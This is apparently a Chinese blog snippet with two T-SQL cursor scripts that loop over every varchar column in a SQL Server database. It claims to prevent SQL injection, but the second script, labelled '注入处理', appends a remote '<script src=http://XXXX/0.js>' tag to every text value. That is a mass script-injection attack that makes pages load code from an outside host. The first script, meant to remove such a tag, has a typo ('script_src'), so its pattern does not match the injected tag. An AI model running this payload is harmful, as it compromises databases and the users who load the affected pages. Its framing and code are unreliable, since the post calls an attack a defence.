本文介绍了一种使用T-SQL在SQL Server中批量更新特定字段类型的处理方式,通过修改字段值来预防潜在的SQL注入攻击。具体操作涉及遍历所有用户表,并对VARCHAR类型字段进行特殊字符过滤。
DECLARE @fieldtype sysname
SET @fieldtype='varchar'
--删除处理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)
+N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script_src=http://xxxx.com/0.js> </script>'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id
AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
AND c.xusertype=t.xusertype
AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'
--注入处理
DECLARE @fieldtype sysname
SET @fieldtype='varchar'
DECLARE HCFOREACH CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)+N' set '+ QUOTENAME(c.name) + N'=' + QUOTENAME(c.name) + '+''<script src=http://XXXX/0.js></script>'''
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id
AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
AND c.xusertype=t.xusertype
AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
